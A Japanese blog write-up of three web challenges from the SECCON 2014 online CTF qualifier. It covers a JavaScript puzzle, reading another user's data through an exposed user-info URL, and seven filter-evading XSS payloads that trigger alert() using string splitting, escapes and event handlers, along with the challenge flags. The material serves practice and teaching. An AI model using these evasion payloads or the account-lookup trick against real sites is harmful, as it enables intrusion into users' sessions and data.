SECCON2014 オンライン予選(英語)Writeup

今週末(2014/12/06-07)に行われたSECCONオンライン予選に参加した(チームScryptos)ので,担当した問題をまとめ.

jspuzzle [Web100]

SECCON2014_jspuzzle

上画像のようなパズルが与えられ,アラートパズルが出るようパズルを組み立てる.完成コードのSHA1ハッシュ値がFlag.

完成コード

"use strict";

({"function" :function(){
    this[ "null" ] = (new Function( "return" + "/*^_^*/" + "this" ))();
    var pattern = "^[w]$";
    var r = new RegExp( pattern );
    this[ r[ "exec" ]( pattern ) ][ "alert" ]( 1 );
}})[ "Function"[ "toLowerCase" ]() ]();

Flag

SECCON{3678cbe0171c8517abeab9d20786a7390ffb602d}  

時間かけすぎました...

参考
What does "return this" do within a javascript function? - Stack Overflow

REA-JUU WATCH [Web200]

リア充をハックする問題.ハックするってなんだろう,最高得点出せばいいのかな?とPython書いてると気になるJS発見.

SECCON2014_reajuu01

http://reajuu.pwn.seccon.jp/users/chk/1  

へアクセスすると,

SECCON2014_reajuu02

上のようなユーザ情報が得られるので,ログインしてゲームを進めるとFlagゲット.

SECCON2014_reajuu03

Flag

SECCON{REA_JUU_Ji8A_NYAN}  

XSS Bonsai [Web500]

bonsaiXSS

ひたすらXSSをする問題.いろいろ問題アリだったようですが,僕的には自分のXSS力が一番の問題でした・・Stage8で終了.

#01
";alert('XSS');//

#02
\";window['al'+'ert']('X'+'SS');//

#03
');(9997)['CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc'[37]+'CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCo'[37]+'CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCn'[37]+....+'CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCS'[37]+'CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCS'[37]+'CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\''[37]+'CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC)'[37])();//

#04
")};(9996)['DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDc'[36]+'DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDo'[36]+'DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDn'[36]+....+'DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD\''[36]+'DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD)'[36])();//

#05
\x3cimg/src='x'/onerror='alert(/XSS/.source)'\x3e

#06
\u003ca/href=javascript:top['\u0061\u006C\u0065\u0072\u0074']('\u0058\u0053\u0053')\u003ehere\u003c\u002fa\u003e

#07
<button/onmouseover=window['al'+'ert'](String.fromCharCode(300-212,300-217,300-217))>  

参考
SECCON 2014 オンライン予選「箱庭XSSリターンズ」Writeup - 雑記

kosk

へっぽこ